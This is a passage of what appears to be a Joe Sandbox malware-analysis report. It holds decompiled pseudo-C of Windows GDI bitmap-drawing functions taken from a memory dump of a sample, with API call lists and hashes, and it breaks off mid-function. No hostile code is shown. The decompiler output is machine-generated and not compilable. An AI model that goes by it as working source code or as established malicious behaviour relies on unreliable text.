                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                  • API String ID: 1646373207-1918263038
                                  • Opcode ID: 255dd2285c0c7b9acaef91aea70060ea4adf23980279e7f8fa5eb05745d3e63d
                                  • Instruction ID: 4e17dbab0ced2a5d9a21aa171c0d3dcd48ca4c1504809416a8193390fea1395b
                                  • Opcode Fuzzy Hash: 255dd2285c0c7b9acaef91aea70060ea4adf23980279e7f8fa5eb05745d3e63d
                                  • Instruction Fuzzy Hash: 4B4124A6E042099BD3086BEE784142777DAD645714360C53FF808FBAC5DF3DA84D9A2E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 52%
                                  			E0041D2E8(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
                                  				int _v8;
                                  				int _v12;
                                  				char _v13;
                                  				struct HDC__* _v20;
                                  				void* _v24;
                                  				void* _v28;
                                  				long _v32;
                                  				long _v36;
                                  				intOrPtr _v40;
                                  				intOrPtr* _t78;
                                  				intOrPtr _t87;
                                  				struct HDC__* _t88;
                                  				intOrPtr _t91;
                                  				struct HDC__* _t92;
                                  				struct HDC__* _t135;
                                  				int _t162;
                                  				intOrPtr _t169;
                                  				intOrPtr _t171;
                                  				struct HDC__* _t173;
                                  				int _t175;
                                  				void* _t177;
                                  				void* _t178;
                                  				intOrPtr _t179;
                                  
                                  				_t177 = _t178;
                                  				_t179 = _t178 + 0xffffffdc;
                                  				_v12 = __ecx;
                                  				_v8 = __edx;
                                  				_t173 = __eax;
                                  				_t175 = _a16;
                                  				_t162 = _a20;
                                  				_v13 = 1;
                                  				_t78 =  *0x44e108; // 0x44d0c4
                                  				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
                                  					_v40 = 0;
                                  					_push(0);
                                  					L00405FC8();
                                  					_v20 = E0041D144(0);
                                  					_push(_t177);
                                  					_push(0x41d568);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t179;
                                  					_push(_t175);
                                  					_push(_t162);
                                  					_push(_a32);
                                  					L00405FC0();
                                  					_v24 = E0041D144(_a32);
                                  					_v28 = SelectObject(_v20, _v24);
                                  					_push(0);
                                  					_t87 =  *0x44f88c; // 0x46080752
                                  					_push(_t87);
                                  					_t88 = _a32;
                                  					_push(_t88);
                                  					L004060F0();
                                  					_v40 = _t88;
                                  					_push(0);
                                  					_push(_v40);
                                  					_push(_a32);
                                  					L004060F0();
                                  					if(_v40 == 0) {
                                  						_push(0xffffffff);
                                  						_t91 =  *0x44f88c; // 0x46080752
                                  						_push(_t91);
                                  						_t92 = _v20;
                                  						_push(_t92);
                                  						L004060F0();
                                  						_v40 = _t92;
                                  					} else {
                                  						_push(0xffffffff);
                                  						_push(_v40);
                                  						_t135 = _v20;
                                  						_push(_t135);
                                  						L004060F0();
                                  						_v40 = _t135;
                                  					}
                                  					_push(_v20);
                                  					L004060C8();
                                  					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
                                  					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
                                  					_v32 = SetTextColor(_t173, 0);
                                  					_v36 = SetBkColor(_t173, 0xffffff);
                                  					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
                                  					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
                                  					SetTextColor(_t173, _v32);
                                  					SetBkColor(_t173, _v36);
                                  					if(_v28 != 0) {
                                  						SelectObject(_v20, _v28);
                                  					}
                                  					DeleteObject(_v24);
                                  					_pop(_t169);
                                  					 *[fs:eax] = _t169;
                                  					_push(E0041D56F);
                                  					if(_v40 != 0) {
                                  						_push(0);
                                  						_push(_v40);
                                  						_push(_v20);
                                  						L004060F0();
                                  					}
                                  					return DeleteDC(_v20);
                                  				} else {
                                  					_push(1);
                                  					_push(1);
                                  					_push(_a32);
                                  					L00405FC0();
                                  					_v24 = E0041D144(_a32);
                                  					_v24 = SelectObject(_a12, _v24);
                                  					_push(_t177);
                                  					_push(0x41d3bb);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t179;
                                  					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00406688(0xaa0029, 0xcc0020));
                                  					_pop(_t171);
                                  					 *[fs:eax] = _t171;
                                  					_push(E0041D56F);
                                  					_v24 = SelectObject(_a12, _v24);
                                  					return DeleteObject(_v24);
                                  				}
                                  			}



























                                  APIs
                                  • 72E7A520.GDI32(?,00000001,00000001), ref: 0041D32B
                                  • SelectObject.GDI32(?,?), ref: 0041D340
                                  • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,0041D3BB,?,?), ref: 0041D38F
                                  • SelectObject.GDI32(?,?), ref: 0041D3A9
                                  • DeleteObject.GDI32(?), ref: 0041D3B5
                                  • 72E7A590.GDI32(00000000), ref: 0041D3C9
                                  • 72E7A520.GDI32(?,?,?,00000000,0041D568,?,00000000), ref: 0041D3EA
                                  • SelectObject.GDI32(?,?), ref: 0041D3FF
                                  • 72E7B410.GDI32(?,46080752,00000000,?,?,?,?,?,00000000,0041D568,?,00000000), ref: 0041D413
                                  • 72E7B410.GDI32(?,?,00000000,?,46080752,00000000,?,?,?,?,?,00000000,0041D568,?,00000000), ref: 0041D425
                                  • 72E7B410.GDI32(?,00000000,000000FF,?,?,00000000,?,46080752,00000000,?,?,?,?,?,00000000,0041D568), ref: 0041D43A
                                  • 72E7B410.GDI32(?,46080752,000000FF,?,?,00000000,?,46080752,00000000,?,?,?,?,?,00000000,0041D568), ref: 0041D450
                                  • 72E7B150.GDI32(?,?,46080752,000000FF,?,?,00000000,?,46080752,00000000,?,?,?,?,?,00000000), ref: 0041D45C
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0041D47E
                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0041D4A0
                                  • SetTextColor.GDI32(?,00000000), ref: 0041D4A8
                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 0041D4B6
                                  • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0041D4E2
                                  • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0041D507
                                  • SetTextColor.GDI32(?,?), ref: 0041D511
                                  • SetBkColor.GDI32(?,?), ref: 0041D51B
                                  • SelectObject.GDI32(?,00000000), ref: 0041D52E
                                  • DeleteObject.GDI32(?), ref: 0041D537
                                  • 72E7B410.GDI32(?,00000000,00000000,0041D56F,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 0041D559
                                  • DeleteDC.GDI32(?), ref: 0041D562
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                  • String ID:
                                  • API String ID: 3348367721-0
                                  • Opcode ID: 1ab7ae72cc2fa5ffd4a8ca6bf5e3ddcea2db1065d303b909324aa4fd19bb13f0
                                  • Instruction ID: 995329ef9f57ada67fb6401559fced5fd10f28d71476005ccbb8dbea30ac6681
                                  • Opcode Fuzzy Hash: 1ab7ae72cc2fa5ffd4a8ca6bf5e3ddcea2db1065d303b909324aa4fd19bb13f0
                                  • Instruction Fuzzy Hash: 6A81A3B1A40209AFDB50EFA9CD81FAF77ECAB0D714F114429F618E7281C639AD508B65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 51%
                                  			E0041F244(void* __eax, long __ecx, intOrPtr __edx) {
                                  				void* _v8;
                                  				intOrPtr _v12;
                                  				struct HDC__* _v16;
                                  				struct HDC__* _v20;
                                  				char _v21;
                                  				void* _v28;
                                  				void* _v32;
                                  				intOrPtr _v92;
                                  				intOrPtr _v96;
                                  				int _v108;
                                  				int _v112;
                                  				void _v116;
                                  				void* _t64;
                                  				int _t65;
                                  				intOrPtr _t66;
                                  				long _t77;
                                  				void* _t107;
                                  				intOrPtr _t116;
                                  				intOrPtr _t117;
                                  				long _t120;
                                  				intOrPtr _t123;
                                  				void* _t127;
                                  				void* _t129;
                                  				intOrPtr _t130;
                                  
                                  				_t127 = _t129;
                                  				_t130 = _t129 + 0xffffff90;
                                  				_t120 = __ecx;
                                  				_t123 = __edx;
                                  				_t107 = __eax;
                                  				_v8 = 0;
                                  				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
                                  					return _v8;
                                  				} else {
                                  					E0041E738(_t107);
                                  					_v12 = 0;
                                  					_v20 = 0;
                                  					_push(_t127);
                                  					_push(0x41f43f);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t130;
                                  					_push(0);
                                  					L004062C0();
                                  					_v12 = E0041D144(0);
                                  					_push(_v12);
                                  					L00405FC8();
                                  					_v20 = E0041D144(_v12);
                                  					_push(0);
                                  					_push(1);
                                  					_push(1);
                                  					_push(_v108);
                                  					_t64 = _v112;
                                  					_push(_t64);
                                  					L00405FB0();
                                  					_v8 = _t64;
                                  					if(_v8 == 0) {
                                  						L18:
                                  						_t65 = 0;
                                  						_pop(_t116);
                                  						 *[fs:eax] = _t116;
                                  						_push(0x41f446);
                                  						if(_v20 != 0) {
                                  							_t65 = DeleteDC(_v20);
                                  						}
                                  						if(_v12 != 0) {
                                  							_t66 = _v12;
                                  							_push(_t66);
                                  							_push(0);
                                  							L004064F8();
                                  							return _t66;
                                  						}
                                  						return _t65;
                                  					} else {
                                  						_v32 = SelectObject(_v20, _v8);
                                  						if(__ecx != 0x1fffffff) {
                                  							_push(_v12);
                                  							L00405FC8();
                                  							_v16 = E0041D144(_v12);
                                  							_push(_t127);
                                  							_push(0x41f3f7);
                                  							_push( *[fs:eax]);
                                  							 *[fs:eax] = _t130;
                                  							if(_v96 == 0) {
                                  								_v21 = 0;
                                  							} else {
                                  								_v21 = 1;
                                  								_v92 = 0;
                                  								_t107 = E0041EB7C(_t107, _t123, _t123, 0,  &_v116);
                                  							}
                                  							_v28 = SelectObject(_v16, _t107);
                                  							if(_t123 != 0) {
                                  								_push(0);
                                  								_push(_t123);
                                  								_push(_v16);
                                  								L004060F0();
                                  								_push(_v16);
                                  								L004060C8();
                                  								_push(0);
                                  								_push(_t123);
                                  								_push(_v20);
                                  								L004060F0();
                                  								_push(_v20);
                                  								L004060C8();
                                  							}
                                  							_t77 = SetBkColor(_v16, _t120);
                                  							_push(0xcc0020);
                                  							_push(0);
                                  							_push(0);
                                  							_push(_v16);
                                  							_push(_v108);
                                  							_push(_v112);
                                  							_push(0);
                                  							_push(0);
                                  							_push(_v20);
                                  							L00405FA8();
                                  							SetBkColor(_v16, _t77);
                                  							if(_v28 != 0) {
                                  								SelectObject(_v16, _v28);
                                  							}
                                  							if(_v21 != 0) {
                                  								DeleteObject(_t107);
                                  							}
                                  							_pop(_t117);
                                  							 *[fs:eax] = _t117;
                                  							_push(0x41f3fe);
                                  							return DeleteDC(_v16);
                                  						} else {
                                  							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
                                  							if(_v32 != 0) {
                                  								SelectObject(_v20, _v32);
                                  							}
                                  							goto L18;
                                  						}
                                  					}
                                  				}
                                  			}




























                                  APIs
                                  • GetObjectA.GDI32(?,00000054,?), ref: 0041F267
                                  • 72E7AC50.USER32(00000000,00000000,0041F43F,?,?,00000054,?), ref: 0041F295
                                  • 72E7A590.GDI32(?,00000000,00000000,0041F43F,?,?,00000054,?), ref: 0041F2A6
                                  • 72E7A410.GDI32(?,?,00000001,00000001,00000000,?,00000000,00000000,0041F43F,?,?,00000054,?), ref: 0041F2C1
                                  • SelectObject.GDI32(?,00000000), ref: 0041F2DB
                                  • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0041F2FD
                                  • 72E7A590.GDI32(?,?,00000000,?,?,00000001,00000001,00000000,?,00000000,00000000,0041F43F,?,?,00000054,?), ref: 0041F30B
                                  • SelectObject.GDI32(?), ref: 0041F353
                                  • 72E7B410.GDI32(?,?,00000000,?,?,00000000,0041F3F7,?,?,?,00000000,?,?,00000001,00000001,00000000), ref: 0041F366
                                  • 72E7B150.GDI32(?,?,?,00000000,?,?,00000000,0041F3F7,?,?,?,00000000,?,?,00000001,00000001), ref: 0041F36F
                                  • 72E7B410.GDI32(?,?,00000000,?,?,?,00000000,?,?,00000000,0041F3F7,?,?,?,00000000,?), ref: 0041F37B
                                  • 72E7B150.GDI32(?,?,?,00000000,?,?,?,00000000,?,?,00000000,0041F3F7,?,?,?,00000000), ref: 0041F384
                                  • SetBkColor.GDI32(?), ref: 0041F38E
                                  • 72E897E0.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,?,?,?,00000000,0041F3F7), ref: 0041F3B2
                                  • SetBkColor.GDI32(?,00000000), ref: 0041F3BC
                                  • SelectObject.GDI32(?,00000000), ref: 0041F3CF
                                  • DeleteObject.GDI32 ref: 0041F3DB
                                  • DeleteDC.GDI32(?), ref: 0041F3F1
                                  • SelectObject.GDI32(?,00000000), ref: 0041F40C
                                  • DeleteDC.GDI32(00000000), ref: 0041F428
                                  • 72E7B380.USER32(00000000,00000000,0041F446,00000001,00000000,?,00000000,00000000,0041F43F,?,?,00000054,?), ref: 0041F439
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Object$Select$Delete$A590B150B410Color$A410B380E897
                                  • String ID:
                                  • API String ID: 4241548881-0
                                  • Opcode ID: d2d6c256d80fc59db48479805b46c774cf83da162ac8937ced3fd103c9342cbc
                                  • Instruction ID: 28178121fae720afaf87065ad6149d50a4ca9fcd309c938633338324e821de39
                                  • Opcode Fuzzy Hash: d2d6c256d80fc59db48479805b46c774cf83da162ac8937ced3fd103c9342cbc
                                  • Instruction Fuzzy Hash: 83514D71E40218ABDB10EBE9CC46FEFB7BCAB08704F11447AB615F72C1D67899458B68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E0041FF60(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr* _v12;
                                  				void* _v16;
                                  				struct HDC__* _v20;
                                  				char _v24;
                                  				intOrPtr* _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v36;
                                  				signed int _v37;
                                  				intOrPtr _v44;
                                  				void* _v48;
                                  				struct HDC__* _v52;
                                  				intOrPtr _v56;
                                  				intOrPtr* _v60;
                                  				intOrPtr* _v64;
                                  				short _v66;
                                  				short _v68;
                                  				signed short _v70;
                                  				signed short _v72;
                                  				void* _v76;
                                  				intOrPtr _v172;
                                  				char _v174;
                                  				intOrPtr _t150;
                                  				signed int _t160;
                                  				intOrPtr _t163;
                                  				void* _t166;
                                  				void* _t174;
                                  				void* _t183;
                                  				signed int _t188;
                                  				intOrPtr _t189;
                                  				struct HDC__* _t190;
                                  				struct HDC__* _t204;
                                  				signed int _t208;
                                  				signed short _t214;
                                  				intOrPtr _t241;
                                  				intOrPtr* _t245;
                                  				intOrPtr _t251;
                                  				intOrPtr _t289;
                                  				intOrPtr _t290;
                                  				intOrPtr _t295;
                                  				signed int _t297;
                                  				signed int _t317;
                                  				void* _t319;
                                  				void* _t320;
                                  				signed int _t321;
                                  				void* _t322;
                                  				void* _t323;
                                  				void* _t324;
                                  				intOrPtr _t325;
                                  
                                  				_t316 = __edi;
                                  				_t323 = _t324;
                                  				_t325 = _t324 + 0xffffff54;
                                  				_t319 = __ecx;
                                  				_v12 = __edx;
                                  				_v8 = __eax;
                                  				_v52 = 0;
                                  				_v44 = 0;
                                  				_v60 = 0;
                                  				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
                                  				_v37 = _v36 == 0xc;
                                  				if(_v37 != 0) {
                                  					_v36 = 0x28;
                                  				}
                                  				_v28 = E004026BC(_v36 + 0x40c);
                                  				_v64 = _v28;
                                  				_push(_t323);
                                  				_push(0x42047d);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t325;
                                  				_push(_t323);
                                  				_push(0x420450);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t325;
                                  				if(_v37 == 0) {
                                  					 *((intOrPtr*)( *_v12 + 0xc))();
                                  					_t320 = _t319 - _v36;
                                  					_t150 =  *((intOrPtr*)(_v64 + 0x10));
                                  					if(_t150 != 3 && _t150 != 0) {
                                  						_v60 = E004030A8(1);
                                  						if(_a4 == 0) {
                                  							E00402AF4( &_v174, 0xe);
                                  							_v174 = 0x4d42;
                                  							_v172 = _v36 + _t320;
                                  							_a4 =  &_v174;
                                  						}
                                  						 *((intOrPtr*)( *_v60 + 0x10))();
                                  						 *((intOrPtr*)( *_v60 + 0x10))();
                                  						 *((intOrPtr*)( *_v60 + 0x10))();
                                  						E00415400(_v60,  *_v60, _v12, _t316, _t320, _t320, 0);
                                  						 *((intOrPtr*)( *_v60 + 0x14))();
                                  						_v12 = _v60;
                                  					}
                                  				} else {
                                  					 *((intOrPtr*)( *_v12 + 0xc))();
                                  					_t251 = _v64;
                                  					E00402AF4(_t251, 0x28);
                                  					_t241 = _t251;
                                  					 *(_t241 + 4) = _v72 & 0x0000ffff;
                                  					 *(_t241 + 8) = _v70 & 0x0000ffff;
                                  					 *((short*)(_t241 + 0xc)) = _v68;
                                  					 *((short*)(_t241 + 0xe)) = _v66;
                                  					_t320 = _t319 - 0xc;
                                  				}
                                  				_t245 = _v64;
                                  				 *_t245 = _v36;
                                  				_v32 = _v28 + _v36;
                                  				if( *((short*)(_t245 + 0xc)) != 1) {
                                  					E0041D030();
                                  				}
                                  				if(_v36 == 0x28) {
                                  					_t214 =  *(_t245 + 0xe);
                                  					if(_t214 == 0x10 || _t214 == 0x20) {
                                  						if( *((intOrPtr*)(_t245 + 0x10)) == 3) {
                                  							E00415390(_v12, 0xc, _v32);
                                  							_v32 = _v32 + 0xc;
                                  							_t320 = _t320 - 0xc;
                                  						}
                                  					}
                                  				}
                                  				if( *(_t245 + 0x20) == 0) {
                                  					 *(_t245 + 0x20) = E0041D2B4( *(_t245 + 0xe));
                                  				}
                                  				_t317 = _v37 & 0x000000ff;
                                  				_t257 =  *(_t245 + 0x20) * 0;
                                  				E00415390(_v12,  *(_t245 + 0x20) * 0, _v32);
                                  				_t321 = _t320 -  *(_t245 + 0x20) * 0;
                                  				if( *(_t245 + 0x14) == 0) {
                                  					_t297 =  *(_t245 + 0xe) & 0x0000ffff;
                                  					_t208 = E0041D2D4( *((intOrPtr*)(_t245 + 4)), 0x20, _t297);
                                  					asm("cdq");
                                  					_t257 = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
                                  					 *(_t245 + 0x14) = _t208 * (( *(_t245 + 8) ^ _t297) - _t297);
                                  				}
                                  				_t160 =  *(_t245 + 0x14);
                                  				if(_t321 > _t160) {
                                  					_t321 = _t160;
                                  				}
                                  				if(_v37 != 0) {
                                  					_t160 = E0041D57C(_v32);
                                  				}
                                  				_push(0);
                                  				L004062C0();
                                  				_v16 = E0041D144(_t160);
                                  				_push(_t323);
                                  				_push(0x4203cb);
                                  				_push( *[fs:edx]);
                                  				 *[fs:edx] = _t325;
                                  				_t163 =  *((intOrPtr*)(_v64 + 0x10));
                                  				if(_t163 == 0 || _t163 == 3) {
                                  					if( *0x44d444 == 0) {
                                  						_push(0);
                                  						_push(0);
                                  						_push( &_v24);
                                  						_push(0);
                                  						_push(_v28);
                                  						_t166 = _v16;
                                  						_push(_t166);
                                  						L00405FD0();
                                  						_v44 = _t166;
                                  						if(_v44 == 0 || _v24 == 0) {
                                  							if(GetLastError() != 0) {
                                  								E0040C3F4(_t245, _t257, _t317, _t321);
                                  							} else {
                                  								E0041D030();
                                  							}
                                  						}
                                  						_push(_t323);
                                  						_push( *[fs:eax]);
                                  						 *[fs:eax] = _t325;
                                  						E00415390(_v12, _t321, _v24);
                                  						_pop(_t289);
                                  						 *[fs:eax] = _t289;
                                  						_t290 = 0x42039a;
                                  						 *[fs:eax] = _t290;
                                  						_push(E004203D2);
                                  						_t174 = _v16;
                                  						_push(_t174);
                                  						_push(0);
                                  						L004064F8();
                                  						return _t174;
                                  					} else {
                                  						goto L27;
                                  					}
                                  				} else {
                                  					L27:
                                  					_v20 = 0;
                                  					_v24 = E004026BC(_t321);
                                  					_push(_t323);
                                  					_push(0x420333);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t325;
                                  					_t263 = _t321;
                                  					E00415390(_v12, _t321, _v24);
                                  					_push(_v16);
                                  					L00405FC8();
                                  					_v20 = E0041D144(_v16);
                                  					_push(1);
                                  					_push(1);
                                  					_t183 = _v16;
                                  					_push(_t183);
                                  					L00405FC0();
                                  					_v48 = SelectObject(_v20, _t183);
                                  					_v56 = 0;
                                  					_t188 =  *(_v64 + 0x20);
                                  					if(_t188 > 0) {
                                  						_t263 = _t188;
                                  						_v52 = E0041D834(0, _t188);
                                  						_push(0);
                                  						_push(_v52);
                                  						_t204 = _v20;
                                  						_push(_t204);
                                  						L004060F0();
                                  						_v56 = _t204;
                                  						_push(_v20);
                                  						L004060C8();
                                  					}
                                  					_push(_t323);
                                  					_push(0x420307);
                                  					_push( *[fs:edx]);
                                  					 *[fs:edx] = _t325;
                                  					_push(0);
                                  					_t189 = _v28;
                                  					_push(_t189);
                                  					_push(_v24);
                                  					_push(4);
                                  					_push(_t189);
                                  					_t190 = _v20;
                                  					_push(_t190);
                                  					L00405FD8();
                                  					_v44 = _t190;
                                  					if(_v44 == 0) {
                                  						if(GetLastError() != 0) {
                                  							E0040C3F4(_t245, _t263, _t317, _t321);
                                  						} else {
                                  							E0041D030();
                                  						}
                                  					}
                                  					_pop(_t295);
                                  					 *[fs:eax] = _t295;
                                  					_push(E0042030E);
                                  					if(_v56 != 0) {
                                  						_push(0xffffffff);
                                  						_push(_v56);
                                  						_push(_v20);
                                  						L004060F0();
                                  					}
                                  					return DeleteObject(SelectObject(_v20, _v48));
                                  				}
                                  			}

                                  APIs
                                  • 72E7AC50.USER32(00000000,?,00000000,0042047D,?,?), ref: 004201CA
                                  • 72E7A590.GDI32(00000001,00000000,00420333,?,00000000,004203CB,?,00000000,?,00000000,0042047D,?,?), ref: 0042022F
                                  • 72E7A520.GDI32(00000001,00000001,00000001,00000001,00000000,00420333,?,00000000,004203CB,?,00000000,?,00000000,0042047D,?,?), ref: 00420244
                                  • SelectObject.GDI32(?,00000000), ref: 0042024E
                                  • 72E7B410.GDI32(?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00420333,?,00000000,004203CB,?,00000000), ref: 0042027E
                                  • 72E7B150.GDI32(?,?,?,00000000,?,00000000,00000001,00000001,00000001,00000001,00000000,00420333,?,00000000,004203CB), ref: 0042028A
                                  • 72E7A7F0.GDI32(?,?,00000004,00000000,?,00000000,00000000,00420307,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004202AE
                                  • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,00420307,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004202BC
                                  • 72E7B410.GDI32(?,00000000,000000FF,0042030E,00000000,?,00000000,00000000,00420307,?,?,00000000,00000001,00000001,00000001,00000001), ref: 004202EE
                                  • SelectObject.GDI32(?,?), ref: 004202FB
                                  • DeleteObject.GDI32(00000000), ref: 00420301
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Object$B410Select$A520A590B150DeleteErrorLast
                                  • String ID: ($BM
                                  • API String ID: 3415089252-2980357723
                                  • Opcode ID: d86eb2f476df3c9e5483b63d9c8b3677971dbd68de94036616106a39dcccc6cd
                                  • Instruction ID: 24be03b2b125ad38a0b42588f7149ab459522e8982ca3bd176c987c921b65b6a
                                  • Opcode Fuzzy Hash: d86eb2f476df3c9e5483b63d9c8b3677971dbd68de94036616106a39dcccc6cd
                                  • Instruction Fuzzy Hash: ECD13D70A002189FDF04DFA9D885BAEBBF5FF49304F50846AE905E7392D7789841CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 71%
                                  			E0041F748(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                  				intOrPtr _v8;
                                  				void* _v12;
                                  				char _v13;
                                  				struct tagPOINT _v21;
                                  				struct HDC__* _v28;
                                  				void* _v32;
                                  				intOrPtr _t78;
                                  				struct HDC__* _t80;
                                  				signed int _t82;
                                  				signed int _t83;
                                  				signed int _t84;
                                  				char _t85;
                                  				void* _t92;
                                  				struct HDC__* _t115;
                                  				void* _t136;
                                  				struct HDC__* _t160;
                                  				intOrPtr* _t164;
                                  				intOrPtr _t172;
                                  				intOrPtr _t176;
                                  				intOrPtr _t178;
                                  				intOrPtr _t180;
                                  				int* _t184;
                                  				intOrPtr _t186;
                                  				void* _t188;
                                  				void* _t189;
                                  				intOrPtr _t190;
                                  
                                  				_t165 = __ecx;
                                  				_t188 = _t189;
                                  				_t190 = _t189 + 0xffffffe4;
                                  				_t184 = __ecx;
                                  				_v8 = __edx;
                                  				_t164 = __eax;
                                  				_t186 =  *((intOrPtr*)(__eax + 0x28));
                                  				_t172 =  *0x41f994; // 0xf
                                  				E0041CE2C(_v8, __ecx, _t172);
                                  				E0041FCD8(_t164);
                                  				_v12 = 0;
                                  				_v13 = 0;
                                  				_t78 =  *((intOrPtr*)(_t186 + 0x10));
                                  				if(_t78 != 0) {
                                  					_push(0xffffffff);
                                  					_push(_t78);
                                  					_t160 =  *(_v8 + 4);
                                  					_push(_t160);
                                  					L004060F0();
                                  					_v12 = _t160;
                                  					_push( *(_v8 + 4));
                                  					L004060C8();
                                  					_v13 = 1;
                                  				}
                                  				_push(0xc);
                                  				_t80 =  *(_v8 + 4);
                                  				_push(_t80);
                                  				L00406058();
                                  				_push(_t80);
                                  				_push(0xe);
                                  				_t82 =  *(_v8 + 4);
                                  				L00406058();
                                  				_t83 = _t82;
                                  				_t84 = _t83 * _t82;
                                  				if(_t84 > 8) {
                                  					L4:
                                  					_t85 = 0;
                                  				} else {
                                  					_t165 =  *(_t186 + 0x28) & 0x0000ffff;
                                  					if(_t84 < ( *(_t186 + 0x2a) & 0x0000ffff) * ( *(_t186 + 0x28) & 0x0000ffff)) {
                                  						_t85 = 1;
                                  					} else {
                                  						goto L4;
                                  					}
                                  				}
                                  				if(_t85 == 0) {
                                  					if(E0041FAD4(_t164) == 0) {
                                  						SetStretchBltMode(E0041CD58(_v8), 3);
                                  					}
                                  				} else {
                                  					GetBrushOrgEx( *(_v8 + 4),  &_v21);
                                  					SetStretchBltMode( *(_v8 + 4), 4);
                                  					SetBrushOrgEx( *(_v8 + 4), _v21, _v21.y,  &_v21);
                                  				}
                                  				_push(_t188);
                                  				_push(0x41f984);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t190;
                                  				if( *((intOrPtr*)( *_t164 + 0x28))() != 0) {
                                  					E0041FC78(_t164, _t165);
                                  				}
                                  				_t92 = E0041FA18(_t164);
                                  				_t176 =  *0x41f994; // 0xf
                                  				E0041CE2C(_t92, _t165, _t176);
                                  				if( *((intOrPtr*)( *_t164 + 0x28))() == 0) {
